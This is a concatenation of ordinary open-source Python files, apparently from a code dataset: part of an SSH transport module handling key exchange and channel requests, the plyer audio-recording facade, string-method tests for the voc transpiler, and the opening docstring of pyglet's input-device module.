self._log(ERROR, 'Socket exception: ' + emsg)
self.saved_exception = e
except Exception, e:
self._log(ERROR, 'Unknown exception: ' + str(e))
self._log(ERROR, util.tb_strings())
self.saved_exception = e
_active_threads.remove(self)
for chan in self._channels.values():
chan._unlink()
if self.active:
self.active = False
self.packetizer.close()
if self.completion_event != None:
self.completion_event.set()
if self.auth_handler is not None:
self.auth_handler.abort()
for event in self.channel_events.values():
event.set()
try:
self.lock.acquire()
self.server_accept_cv.notify()
finally:
self.lock.release()
self.sock.close()
except:
# Don't raise spurious 'NoneType has no attribute X' errors when we
# wake up during interpreter shutdown. Or rather -- raise
# everything *if* sys.modules (used as a convenient sentinel)
# appears to still exist.
if self.sys.modules is not None:
raise
### protocol stages
def _negotiate_keys(self, m):
# throws SSHException on anything unusual
self.clear_to_send_lock.acquire()
try:
self.clear_to_send.clear()
finally:
self.clear_to_send_lock.release()
if self.local_kex_init == None:
# remote side wants to renegotiate
self._send_kex_init()
self._parse_kex_init(m)
self.kex_engine.start_kex()
def _check_banner(self):
# this is slow, but we only have to do it once
for i in range(100):
# give them 15 seconds for the first line, then just 2 seconds
# each additional line. (some sites have very high latency.)
if i == 0:
timeout = self.banner_timeout
else:
timeout = 2
try:
buf = self.packetizer.readline(timeout)
except Exception, x:
                raise SSHException('Error reading SSH protocol banner: ' + str(x))
if buf[:4] == 'SSH-':
break
self._log(DEBUG, 'Banner: ' + buf)
if buf[:4] != 'SSH-':
raise SSHException('Indecipherable protocol version "' + buf + '"')
# save this server version string for later
self.remote_version = buf
# pull off any attached comment
comment = ''
i = string.find(buf, ' ')
if i >= 0:
comment = buf[i+1:]
buf = buf[:i]
# parse out version string and make sure it matches
segs = buf.split('-', 2)
if len(segs) < 3:
raise SSHException('Invalid SSH banner')
version = segs[1]
client = segs[2]
if version != '1.99' and version != '2.0':
raise SSHException('Incompatible version (%s instead of 2.0)' % (version,))
self._log(INFO, 'Connected (version %s, client %s)' % (version, client))
def _send_kex_init(self):
"""
announce to the other side that we'd like to negotiate keys, and what
kind of key negotiation we support.
"""
self.clear_to_send_lock.acquire()
try:
self.clear_to_send.clear()
finally:
self.clear_to_send_lock.release()
self.in_kex = True
if self.server_mode:
if (self._modulus_pack is None) and ('diffie-hellman-group-exchange-sha1' in self._preferred_kex):
# can't do group-exchange if we don't have a pack of potential primes
pkex = list(self.get_security_options().kex)
pkex.remove('diffie-hellman-group-exchange-sha1')
self.get_security_options().kex = pkex
available_server_keys = filter(self.server_key_dict.keys().__contains__,
self._preferred_keys)
else:
available_server_keys = self._preferred_keys
m = Message()
m.add_byte(chr(MSG_KEXINIT))
m.add_bytes(rng.read(16))
m.add_list(self._preferred_kex)
m.add_list(available_server_keys)
m.add_list(self._preferred_ciphers)
m.add_list(self._preferred_ciphers)
m.add_list(self._preferred_macs)
m.add_list(self._preferred_macs)
m.add_list(self._preferred_compression)
m.add_list(self._preferred_compression)
m.add_string('')
m.add_string('')
m.add_boolean(False)
m.add_int(0)
# save a copy for later (needed to compute a hash)
self.local_kex_init = str(m)
self._send_message(m)
def _parse_kex_init(self, m):
cookie = m.get_bytes(16)
kex_algo_list = m.get_list()
server_key_algo_list = m.get_list()
client_encrypt_algo_list = m.get_list()
server_encrypt_algo_list = m.get_list()
client_mac_algo_list = m.get_list()
server_mac_algo_list = m.get_list()
client_compress_algo_list = m.get_list()
server_compress_algo_list = m.get_list()
client_lang_list = m.get_list()
server_lang_list = m.get_list()
kex_follows = m.get_boolean()
unused = m.get_int()
self._log(DEBUG, 'kex algos:' + str(kex_algo_list) + ' server key:' + str(server_key_algo_list) + \
' client encrypt:' + str(client_encrypt_algo_list) + \
' server encrypt:' + str(server_encrypt_algo_list) + \
' client mac:' + str(client_mac_algo_list) + \
' server mac:' + str(server_mac_algo_list) + \
' client compress:' + str(client_compress_algo_list) + \
' server compress:' + str(server_compress_algo_list) + \
' client lang:' + str(client_lang_list) + \
' server lang:' + str(server_lang_list) + \
' kex follows?' + str(kex_follows))
# as a server, we pick the first item in the client's list that we support.
# as a client, we pick the first item in our list that the server supports.
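        # (illustrative example: if the client's list is ['aes128-ctr',
        # 'blowfish-cbc'] and the server's is ['aes256-ctr', 'aes128-ctr'],
        # both rules yield 'aes128-ctr' -- the first entry of the client's
        # list that the server also supports; the same pattern is applied to
        # the key, cipher, mac and compression lists below.)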
if self.server_mode:
agreed_kex = filter(self._preferred_kex.__contains__, kex_algo_list)
else:
agreed_kex = filter(kex_algo_list.__contains__, self._preferred_kex)
if len(agreed_kex) == 0:
raise SSHException('Incompatible ssh peer (no acceptable kex algorithm)')
self.kex_engine = self._kex_info[agreed_kex[0]](self)
if self.server_mode:
available_server_keys = filter(self.server_key_dict.keys().__contains__,
self._preferred_keys)
agreed_keys = filter(available_server_keys.__contains__, server_key_algo_list)
else:
agreed_keys = filter(server_key_algo_list.__contains__, self._preferred_keys)
if len(agreed_keys) == 0:
raise SSHException('Incompatible ssh peer (no acceptable host key)')
self.host_key_type = agreed_keys[0]
if self.server_mode and (self.get_server_key() is None):
raise SSHException('Incompatible ssh peer (can\'t match requested host key type)')
if self.server_mode:
agreed_local_ciphers = filter(self._preferred_ciphers.__contains__,
server_encrypt_algo_list)
agreed_remote_ciphers = filter(self._preferred_ciphers.__contains__,
client_encrypt_algo_list)
else:
agreed_local_ciphers = filter(client_encrypt_algo_list.__contains__,
self._preferred_ciphers)
agreed_remote_ciphers = filter(server_encrypt_algo_list.__contains__,
self._preferred_ciphers)
if (len(agreed_local_ciphers) == 0) or (len(agreed_remote_ciphers) == 0):
raise SSHException('Incompatible ssh server (no acceptable ciphers)')
self.local_cipher = agreed_local_ciphers[0]
self.remote_cipher = agreed_remote_ciphers[0]
self._log(DEBUG, 'Ciphers agreed: local=%s, remote=%s' % (self.local_cipher, self.remote_cipher))
if self.server_mode:
agreed_remote_macs = filter(self._preferred_macs.__contains__, client_mac_algo_list)
agreed_local_macs = filter(self._preferred_macs.__contains__, server_mac_algo_list)
else:
agreed_local_macs = filter(client_mac_algo_list.__contains__, self._preferred_macs)
agreed_remote_macs = filter(server_mac_algo_list.__contains__, self._preferred_macs)
if (len(agreed_local_macs) == 0) or (len(agreed_remote_macs) == 0):
raise SSHException('Incompatible ssh server (no acceptable macs)')
self.local_mac = agreed_local_macs[0]
self.remote_mac = agreed_remote_macs[0]
if self.server_mode:
agreed_remote_compression = filter(self._preferred_compression.__contains__, client_compress_algo_list)
agreed_local_compression = filter(self._preferred_compression.__contains__, server_compress_algo_list)
else:
agreed_local_compression = filter(client_compress_algo_list.__contains__, self._preferred_compression)
agreed_remote_compression = filter(server_compress_algo_list.__contains__, self._preferred_compression)
if (len(agreed_local_compression) == 0) or (len(agreed_remote_compression) == 0):
raise SSHException('Incompatible ssh server (no acceptable compression) %r %r %r' % (agreed_local_compression, agreed_remote_compression, self._preferred_compression))
self.local_compression = agreed_local_compression[0]
self.remote_compression = agreed_remote_compression[0]
self._log(DEBUG, 'using kex %s; server key type %s; cipher: local %s, remote %s; mac: local %s, remote %s; compression: local %s, remote %s' %
(agreed_kex[0], self.host_key_type, self.local_cipher, self.remote_cipher, self.local_mac,
self.remote_mac, self.local_compression, self.remote_compression))
# save for computing hash later...
# now wait! openssh has a bug (and others might too) where there are
# actually some extra bytes (one NUL byte in openssh's case) added to
# the end of the packet but not parsed. turns out we need to throw
# away those bytes because they aren't part of the hash.
self.remote_kex_init = chr(MSG_KEXINIT) + m.get_so_far()
def _activate_inbound(self):
"switch on newly negotiated encryption parameters for inbound traffic"
block_size = self._cipher_info[self.remote_cipher]['block-size']
if self.server_mode:
IV_in = self._compute_key('A', block_size)
key_in = self._compute_key('C', self._cipher_info[self.remote_cipher]['key-size'])
else:
IV_in = self._compute_key('B', block_size)
key_in = self._compute_key('D', self._cipher_info[self.remote_cipher]['key-size'])
engine = self._get_cipher(self.remote_cipher, key_in, IV_in)
mac_size = self._mac_info[self.remote_mac]['size']
mac_engine = self._mac_info[self.remote_mac]['class']
# initial mac keys are done in the hash's natural size (not the potentially truncated
# transmission size)
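        # (e.g. for hmac-sha1-96 the key is derived at SHA-1's full 20-byte
        # digest size even though only 12 bytes of each MAC are transmitted)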
if self.server_mode:
mac_key = self._compute_key('E', mac_engine.digest_size)
else:
mac_key = self._compute_key('F', mac_engine.digest_size)
self.packetizer.set_inbound_cipher(engine, block_size, mac_engine, mac_size, mac_key)
compress_in = self._compression_info[self.remote_compression][1]
if (compress_in is not None) and ((self.remote_compression != 'zlib@openssh.com') or self.authenticated):
self._log(DEBUG, 'Switching on inbound compression ...')
self.packetizer.set_inbound_compressor(compress_in())
def _activate_outbound(self):
"switch on newly negotiated encryption parameters for outbound traffic"
m = Message()
m.add_byte(chr(MSG_NEWKEYS))
self._send_message(m)
block_size = self._cipher_info[self.local_cipher]['block-size']
if self.server_mode:
IV_out = self._compute_key('B', block_size)
key_out = self._compute_key('D', self._cipher_info[self.local_cipher]['key-size'])
else:
IV_out = self._compute_key('A', block_size)
key_out = self._compute_key('C', self._cipher_info[self.local_cipher]['key-size'])
engine = self._get_cipher(self.local_cipher, key_out, IV_out)
mac_size = self._mac_info[self.local_mac]['size']
mac_engine = self._mac_info[self.local_mac]['class']
# initial mac keys are done in the hash's natural size (not the potentially truncated
# transmission size)
if self.server_mode:
mac_key = self._compute_key('F', mac_engine.digest_size)
else:
mac_key = self._compute_key('E', mac_engine.digest_size)
self.packetizer.set_outbound_cipher(engine, block_size, mac_engine, mac_size, mac_key)
compress_out = self._compression_info[self.local_compression][0]
if (compress_out is not None) and ((self.local_compression != 'zlib@openssh.com') or self.authenticated):
self._log(DEBUG, 'Switching on outbound compression ...')
self.packetizer.set_outbound_compressor(compress_out())
if not self.packetizer.need_rekey():
self.in_kex = False
# we always expect to receive NEWKEYS now
self._expect_packet(MSG_NEWKEYS)
def _auth_trigger(self):
self.authenticated = True
# delayed initiation of compression
if self.local_compression == 'zlib@openssh.com':
compress_out = self._compression_info[self.local_compression][0]
self._log(DEBUG, 'Switching on outbound compression ...')
self.packetizer.set_outbound_compressor(compress_out())
if self.remote_compression == 'zlib@openssh.com':
compress_in = self._compression_info[self.remote_compression][1]
self._log(DEBUG, 'Switching on inbound compression ...')
self.packetizer.set_inbound_compressor(compress_in())
def _parse_newkeys(self, m):
self._log(DEBUG, 'Switch to new keys ...')
self._activate_inbound()
# can also free a bunch of stuff here
self.local_kex_init = self.remote_kex_init = None
self.K = None
self.kex_engine = None
if self.server_mode and (self.auth_handler is None):
# create auth handler for server mode
self.auth_handler = AuthHandler(self)
if not self.initial_kex_done:
# this was the first key exchange
self.initial_kex_done = True
# send an event?
if self.completion_event != None:
self.completion_event.set()
# it's now okay to send data again (if this was a re-key)
if not self.packetizer.need_rekey():
self.in_kex = False
self.clear_to_send_lock.acquire()
try:
self.clear_to_send.set()
finally:
self.clear_to_send_lock.release()
return
def _parse_disconnect(self, m):
code = m.get_int()
desc = m.get_string()
self._log(INFO, 'Disconnect (code %d): %s' % (code, desc))
def _parse_global_request(self, m):
kind = m.get_string()
self._log(DEBUG, 'Received global request "%s"' % kind)
want_reply = m.get_boolean()
if not self.server_mode:
self._log(DEBUG, 'Rejecting "%s" global request from server.' % kind)
ok = False
elif kind == 'tcpip-forward':
address = m.get_string()
port = m.get_int()
ok = self.server_object.check_port_forward_request(address, port)
if ok != False:
ok = (ok,)
elif kind == 'cancel-tcpip-forward':
address = m.get_string()
port = m.get_int()
self.server_object.cancel_port_forward_request(address, port)
ok = True
else:
ok = self.server_object.check_global_request(kind, m)
extra = ()
if type(ok) is tuple:
extra = ok
ok = True
if want_reply:
msg = Message()
if ok:
msg.add_byte(chr(MSG_REQUEST_SUCCESS))
msg.add(*extra)
else:
msg.add_byte(chr(MSG_REQUEST_FAILURE))
self._send_message(msg)
def _parse_request_success(self, m):
self._log(DEBUG, 'Global request successful.')
self.global_response = m
if self.completion_event is not None:
self.completion_event.set()
def _parse_request_failure(self, m):
self._log(DEBUG, 'Global request denied.')
self.global_response = None
if self.completion_event is not None:
self.completion_event.set()
def _parse_channel_open_success(self, m):
chanid = m.get_int()
server_chanid = m.get_int()
server_window_size = m.get_int()
server_max_packet_size = m.get_int()
chan = self._channels.get(chanid)
if chan is None:
self._log(WARNING, 'Success for unrequested channel! [??]')
return
self.lock.acquire()
try:
chan._set_remote_channel(server_chanid, server_window_size, server_max_packet_size)
self._log(INFO, 'Secsh channel %d opened.' % chanid)
if chanid in self.channel_events:
self.channel_events[chanid].set()
del self.channel_events[chanid]
finally:
self.lock.release()
return
def _parse_channel_open_failure(self, m):
chanid = m.get_int()
reason = m.get_int()
reason_str = m.get_string()
lang = m.get_string()
reason_text = CONNECTION_FAILED_CODE.get(reason, '(unknown code)')
self._log(INFO, 'Secsh channel %d open FAILED: %s: %s' % (chanid, reason_str, reason_text))
self.lock.acquire()
try:
self.saved_exception = ChannelException(reason, reason_text)
if chanid in self.channel_events:
self._channels.delete(chanid)
if chanid in self.channel_events:
self.channel_events[chanid].set()
del self.channel_events[chanid]
finally:
self.lock.release()
return
def _parse_channel_open(self, m):
kind = m.get_string()
chanid = m.get_int()
initial_window_size = m.get_int()
max_packet_size = m.get_int()
reject = False
if (kind == 'auth-agent@openssh.com') and (self._forward_agent_handler is not None):
self._log(DEBUG, 'Incoming forward agent connection')
self.lock.acquire()
try:
my_chanid = self._next_channel()
finally:
self.lock.release()
elif (kind == 'x11') and (self._x11_handler is not None):
origin_addr = m.get_string()
origin_port = m.get_int()
self._log(DEBUG, 'Incoming x11 connection from %s:%d' % (origin_addr, origin_port))
self.lock.acquire()
try:
my_chanid = self._next_channel()
finally:
self.lock.release()
elif (kind == 'forwarded-tcpip') and (self._tcp_handler is not None):
server_addr = m.get_string()
server_port = m.get_int()
origin_addr = m.get_string()
origin_port = m.get_int()
self._log(DEBUG, 'Incoming tcp forwarded connection from %s:%d' % (origin_addr, origin_port))
self.lock.acquire()
try:
my_chanid = self._next_channel()
finally:
self.lock.release()
elif not self.server_mode:
self._log(DEBUG, 'Rejecting "%s" channel request from server.' % kind)
reject = True
reason = OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED
else:
self.lock.acquire()
try:
my_chanid = self._next_channel()
finally:
self.lock.release()
if kind == 'direct-tcpip':
                # handle direct-tcpip requests coming from the client
dest_addr = m.get_string()
dest_port = m.get_int()
origin_addr = m.get_string()
origin_port = m.get_int()
reason = self.server_object.check_channel_direct_tcpip_request(
my_chanid, (origin_addr, origin_port),
(dest_addr, dest_port))
else:
reason = self.server_object.check_channel_request(kind, my_chanid)
if reason != OPEN_SUCCEEDED:
self._log(DEBUG, 'Rejecting "%s" channel request from client.' % kind)
reject = True
if reject:
msg = Message()
msg.add_byte(chr(MSG_CHANNEL_OPEN_FAILURE))
msg.add_int(chanid)
msg.add_int(reason)
msg.add_string('')
msg.add_string('en')
self._send_message(msg)
return
chan = Channel(my_chanid)
self.lock.acquire()
try:
self._channels.put(my_chanid, chan)
self.channels_seen[my_chanid] = True
chan._set_transport(self)
chan._set_window(self.window_size, self.max_packet_size)
chan._set_remote_channel(chanid, initial_window_size, max_packet_size)
finally:
self.lock.release()
m = Message()
m.add_byte(chr(MSG_CHANNEL_OPEN_SUCCESS))
m.add_int(chanid)
m.add_int(my_chanid)
m.add_int(self.window_size)
m.add_int(self.max_packet_size)
self._send_message(m)
self._log(INFO, 'Secsh channel %d (%s) opened.', my_chanid, kind)
if kind == 'auth-agent@openssh.com':
self._forward_agent_handler(chan)
elif kind == 'x11':
self._x11_handler(chan, (origin_addr, origin_port))
elif kind == 'forwarded-tcpip':
chan.origin_addr = (origin_addr, origin_port)
self._tcp_handler(chan, (origin_addr, origin_port), (server_addr, server_port))
else:
self._queue_incoming_channel(chan)
def _parse_debug(self, m):
always_display = m.get_boolean()
msg = m.get_string()
lang = m.get_string()
self._log(DEBUG, 'Debug msg: ' + util.safe_string(msg))
def _get_subsystem_handler(self, name):
try:
self.lock.acquire()
if name not in self.subsystem_table:
return (None, [], {})
return self.subsystem_table[name]
finally:
self.lock.release()
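    # Message-type dispatch tables used by the run() loop above: entries in
    # _handler_table are transport-level handlers called with (self, msg),
    # while entries in _channel_handler_table are forwarded to the Channel
    # object identified by the channel id at the start of the message.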
_handler_table = {
MSG_NEWKEYS: _parse_newkeys,
MSG_GLOBAL_REQUEST: _parse_global_request,
MSG_REQUEST_SUCCESS: _parse_request_success,
MSG_REQUEST_FAILURE: _parse_request_failure,
MSG_CHANNEL_OPEN_SUCCESS: _parse_channel_open_success,
MSG_CHANNEL_OPEN_FAILURE: _parse_channel_open_failure,
MSG_CHANNEL_OPEN: _parse_channel_open,
MSG_KEXINIT: _negotiate_keys,
}
_channel_handler_table = {
MSG_CHANNEL_SUCCESS: Channel._request_success,
MSG_CHANNEL_FAILURE: Channel._request_failed,
MSG_CHANNEL_DATA: Channel._feed,
MSG_CHANNEL_EXTENDED_DATA: Channel._feed_extended,
MSG_CHANNEL_WINDOW_ADJUST: Channel._window_adjust,
MSG_CHANNEL_REQUEST: Channel._handle_request,
MSG_CHANNEL_EOF: Channel._handle_eof,
MSG_CHANNEL_CLOSE: Channel._handle_close,
}
|
bitprophet/ssh
|
ssh/transport.py
|
Python
|
lgpl-2.1
| 88,838 | 0.002161 |
'''
Audio
=====
The :class:`Audio` is used for recording audio.
Default path for recording is set in platform implementation.
.. note::
On Android the `RECORD_AUDIO`, `WAKE_LOCK` permissions are needed.
Simple Examples
---------------
To get the file path::
>>> audio.file_path
'/sdcard/testrecorder.3gp'
To set the file path::
>>> import os
>>> current_list = os.listdir('.')
['/sdcard/testrecorder.3gp', '/sdcard/testrecorder1.3gp',
'/sdcard/testrecorder2.3gp', '/sdcard/testrecorder3.3gp']
>>> file_path = current_list[2]
>>> audio.file_path = file_path
To start recording::
>>> from plyer import audio
>>> audio.start()
To stop recording::
>>> audio.stop()
To play recording::
>>> audio.play()
'''
class Audio(object):
'''
Audio facade.
'''
state = 'ready'
_file_path = ''
def __init__(self, file_path):
super(Audio, self).__init__()
self._file_path = file_path
def start(self):
'''
Start record.
'''
self._start()
self.state = 'recording'
def stop(self):
'''
Stop record.
'''
self._stop()
self.state = 'ready'
def play(self):
'''
Play current recording.
'''
self._play()
self.state = 'playing'
@property
def file_path(self):
return self._file_path
@file_path.setter
def file_path(self, location):
'''
Location of the recording.
'''
assert isinstance(location, (basestring, unicode)), \
'Location must be string or unicode'
self._file_path = location
# private
def _start(self):
raise NotImplementedError()
def _stop(self):
raise NotImplementedError()
def _play(self):
raise NotImplementedError()
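# Illustrative sketch (not part of plyer): a minimal backend for the facade
# above. A real platform implementation would drive the native recorder; this
# hypothetical one only logs what it would do, to show that a backend
# subclasses Audio and fills in the private _start/_stop/_play hooks which the
# public start()/stop()/play() methods call.
class _LoggingAudio(Audio):
    def _start(self):
        print('would start recording to %s' % self.file_path)
    def _stop(self):
        print('would stop recording')
    def _play(self):
        print('would play %s' % self.file_path)
# Example usage (hypothetical path):
#     audio = _LoggingAudio(file_path='/tmp/testrecorder.3gp')
#     audio.start(); audio.stop(); audio.play()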
|
johnbolia/plyer
|
plyer/facades/audio.py
|
Python
|
mit
| 1,873 | 0 |
from .. utils import TranspileTestCase, UnaryOperationTestCase, BinaryOperationTestCase, InplaceOperationTestCase
class StrTests(TranspileTestCase):
def test_setattr(self):
self.assertCodeExecution("""
x = "Hello, world"
x.attr = 42
print('Done.')
""")
def test_endswith(self):
self.assertCodeExecution("""
s = "abracadabra"
suffix = "abra"
            print(s.endswith(suffix))
""")
self.assertCodeExecution("""
s = "abracadabra"
suffix = "ABRA"
            print(s.endswith(suffix))
""")
self.assertCodeExecution("""
s = "ABRACADABRA"
suffix = "abra"
            print(s.endswith(suffix))
""")
# self.assertCodeExecution("""
# print('abracadabra'.endswith('abra'))
# """)
def test_getattr(self):
self.assertCodeExecution("""
x = "Hello, world"
print(x.attr)
print('Done.')
""")
def test_getitem(self):
# Simple positive index
self.assertCodeExecution("""
x = "12345"
print(x[2])
""")
# Simple negative index
self.assertCodeExecution("""
x = "12345"
print(x[-2])
""")
# Positive index out of range
self.assertCodeExecution("""
x = "12345"
print(x[10])
""")
# Negative index out of range
self.assertCodeExecution("""
x = "12345"
print(x[-10])
""")
def test_slice(self):
# Full slice
self.assertCodeExecution("""
x = "12345"
print(x[:])
""")
# Left bound slice
self.assertCodeExecution("""
x = "12345"
print(x[1:])
""")
# Right bound slice
self.assertCodeExecution("""
x = "12345"
print(x[:4])
""")
# Slice bound in both directions
self.assertCodeExecution("""
x = "12345"
print(x[1:4])
""")
# Slice bound in both directions with end out of bounds
self.assertCodeExecution("""
x = "12345"
print(x[1:6])
""")
# Slice bound in both directions with start out of bounds
self.assertCodeExecution("""
x = "12345"
print(x[6:7])
""")
def test_case_changes(self):
self.assertCodeExecution("""
for s in ['hello, world', 'HEllo, WORLD', 'átomo', '']:
print(s.capitalize())
print(s.lower())
            # print(s.swapcase())
print(s.title())
print(s.upper())
""")
def test_index(self):
self.assertCodeExecution("""
s = 'hello hell'
print(s.index('hell'))
""")
self.assertCodeExecution("""
s = 'hello hell'
print(s.index('world'))
""")
self.assertCodeExecution("""
s = 'hello hell'
print(s.index('hell', 1))
""")
self.assertCodeExecution("""
s = 'hello hell'
print(s.index('hell', 1, 3))
""")
self.assertCodeExecution("""
s = 'hello hell'
print(s.index('hell', 1, 100))
""")
self.assertCodeExecution("""
s = 'hello hell'
print(s.index('hell', 1, -1))
""")
self.assertCodeExecution("""
s = 'hello hell'
print(s.index('hell', -4))
""")
def test_count(self):
self.assertCodeExecution("""
s = 'hello hell'
print(s.count('e'))
""")
self.assertCodeExecution("""
s = 'hello hell'
print(s.count('a'))
""")
self.assertCodeExecution("""
s = 'hello hell'
print(s.count('ll'))
""")
self.assertCodeExecution("""
s = 'hello hell'
print(s.count('ll', 3))
""")
self.assertCodeExecution("""
s = 'hello hell'
print(s.count('ll', 3, 4))
""")
self.assertCodeExecution("""
s = 'hello hell'
print(s.count('ll', 0, 4))
""")
self.assertCodeExecution("""
s = 'hello hell'
print(s.count('ll', 0, 100))
""")
self.assertCodeExecution("""
s = 'hello hell'
print(s.count('hell', 1, -1))
""")
self.assertCodeExecution("""
s = 'hello hell'
print(s.count('hell', -4))
""")
def test_find(self):
self.assertCodeExecution("""
s = 'hello hell'
print(s.find('hell'))
""")
self.assertCodeExecution("""
s = 'hello hell'
print(s.find('world'))
""")
self.assertCodeExecution("""
s = 'hello hell'
print(s.find('hell', 1))
""")
self.assertCodeExecution("""
s = 'hello hell'
print(s.find('hell', 1, 3))
""")
self.assertCodeExecution("""
s = 'hello hell'
print(s.find('hell', 1, 100))
""")
self.assertCodeExecution("""
s = 'hello hell'
print(s.find('hell', 1, -1))
""")
self.assertCodeExecution("""
s = 'hello hell'
print(s.find('hell', -4))
""")
def test_expand(self):
self.assertCodeExecution("""
print('\\t'.expandtabs())
print('a\\t'.expandtabs())
print('aa\\t'.expandtabs())
print('aaa\\t'.expandtabs())
print('aaaaaaaa\\t'.expandtabs())
print('a\\naa\\t'.expandtabs())
print('\\t'.expandtabs(3))
print('a\\t'.expandtabs(3))
print('aa\\t'.expandtabs(7))
print('aaa\\t'.expandtabs(4))
print('aaaaaaaa\\t'.expandtabs(4))
print('a\\naa\\t'.expandtabs(4))
""")
def test_title(self):
self.assertCodeExecution("""
s = ' foo bar baz '
print(s.title())
""")
def test_len(self):
self.assertCodeExecution("""
s = ' foo bar baz '
print(len(s))
""")
class UnaryStrOperationTests(UnaryOperationTestCase, TranspileTestCase):
data_type = 'str'
not_implemented = [
]
class BinaryStrOperationTests(BinaryOperationTestCase, TranspileTestCase):
data_type = 'str'
not_implemented = [
'test_add_class',
'test_add_frozenset',
'test_and_class',
'test_and_frozenset',
'test_eq_class',
'test_eq_frozenset',
'test_floor_divide_class',
'test_floor_divide_complex',
'test_floor_divide_frozenset',
'test_ge_class',
'test_ge_frozenset',
'test_gt_class',
'test_gt_frozenset',
'test_le_class',
'test_le_frozenset',
'test_lshift_class',
'test_lshift_frozenset',
'test_lt_class',
'test_lt_frozenset',
'test_modulo_bool',
'test_modulo_bytes',
'test_modulo_bytearray',
'test_modulo_class',
'test_modulo_complex',
'test_modulo_dict',
'test_modulo_float',
'test_modulo_frozenset',
'test_modulo_slice',
'test_modulo_int',
'test_modulo_list',
'test_modulo_None',
'test_modulo_NotImplemented',
'test_modulo_range',
'test_modulo_set',
'test_modulo_str',
'test_modulo_tuple',
'test_multiply_class',
'test_multiply_frozenset',
'test_ne_class',
'test_ne_frozenset',
'test_or_class',
'test_or_frozenset',
'test_power_class',
'test_power_frozenset',
'test_rshift_class',
'test_rshift_frozenset',
'test_subscr_bool',
'test_subscr_class',
'test_subscr_frozenset',
'test_subscr_slice',
'test_subtract_class',
'test_subtract_frozenset',
'test_true_divide_class',
'test_true_divide_frozenset',
'test_xor_class',
'test_xor_frozenset',
]
class InplaceStrOperationTests(InplaceOperationTestCase, TranspileTestCase):
data_type = 'str'
not_implemented = [
'test_add_class',
'test_add_frozenset',
'test_and_class',
'test_and_frozenset',
'test_floor_divide_class',
'test_floor_divide_complex',
'test_floor_divide_frozenset',
'test_lshift_class',
'test_lshift_frozenset',
'test_modulo_bool',
'test_modulo_bytes',
'test_modulo_bytearray',
'test_modulo_class',
'test_modulo_complex',
'test_modulo_dict',
'test_modulo_float',
'test_modulo_frozenset',
'test_modulo_slice',
'test_modulo_int',
'test_modulo_list',
'test_modulo_None',
'test_modulo_NotImplemented',
'test_modulo_range',
'test_modulo_set',
'test_modulo_str',
'test_modulo_tuple',
'test_multiply_class',
'test_multiply_frozenset',
'test_or_class',
'test_or_frozenset',
'test_power_class',
'test_power_frozenset',
'test_rshift_class',
'test_rshift_frozenset',
'test_subtract_class',
'test_subtract_frozenset',
'test_true_divide_class',
'test_true_divide_frozenset',
'test_xor_class',
'test_xor_frozenset',
]
|
Felix5721/voc
|
tests/datatypes/test_str.py
|
Python
|
bsd-3-clause
| 9,931 | 0.000101 |
# ----------------------------------------------------------------------------
# pyglet
# Copyright (c) 2006-2008 Alex Holkner
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of pyglet nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
'''Joystick, tablet and USB HID device support.
This module provides a unified interface to almost any input device, besides
the regular mouse and keyboard support provided by `Window`. At the lowest
level, `get_devices` can be used to retrieve a list of all supported devices,
including joysticks, tablets, space controllers, wheels, pedals, remote
controls, keyboards and mice. The set of returned devices varies greatly
depending on the operating system (and, of course, what's plugged in).
At this level pyglet does not try to interpret *what* a particular device is,
merely what controls it provides. A `Control` can be either a button, whose
value is either ``True`` or ``False``, or a relative or absolute-valued axis,
whose value is a float. Sometimes the name of a control can be provided (for
example, ``x``, representing the horizontal axis of a joystick), but often
not. In these cases the device API may still be useful -- the user will have
to be asked to press each button in turn or move each axis separately to
identify them.
Higher-level interfaces are provided for joysticks, tablets and the Apple
remote control. These devices can usually be positively identified by pyglet,
and a base level of functionality for each is provided through a common
interface.
To use an input device:
1. Call `get_devices`, `get_apple_remote` or `get_joysticks`
to retrieve and identify the device.
2. For low-level devices (retrieved by `get_devices`), query the devices
list of controls and determine which ones you are interested in. For
high-level interfaces the set of controls is provided by the interface.
3. Optionally attach event handlers to controls on the device.
4. Call `Device.open` to begin receiving events on the device. You can
begin querying the control values after this time; they will be updated
asynchronously.
5. Call `Device.close` when you are finished with the device (not needed
if your application quits at this time).
To use a tablet, follow the procedure above using `get_tablets`, but note that
no control list is available; instead, calling `Tablet.open` returns a
`TabletCanvas` onto which you should set your event handlers.
:since: pyglet 1.2
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id: $'
import sys
from base import Device, Control, RelativeAxis, AbsoluteAxis, \
Button, Joystick, AppleRemote, Tablet
from base import DeviceException, DeviceOpenException, DeviceExclusiveException
_is_epydoc = hasattr(sys, 'is_epydoc') and sys.is_epydoc
def get_apple_remote(display=None):
'''Get the Apple remote control device.
The Apple remote is the small white 6-button remote control that
accompanies most recent Apple desktops and laptops. The remote can only
be used with Mac OS X.
:Parameters:
`display` : `Display`
Currently ignored.
:rtype: `AppleRemote`
:return: The remote device, or ``None`` if the computer does not support
it.
'''
return None
if _is_epydoc:
def get_devices(display=None):
'''Get a list of all attached input devices.
:Parameters:
`display` : `Display`
The display device to query for input devices. Ignored on Mac
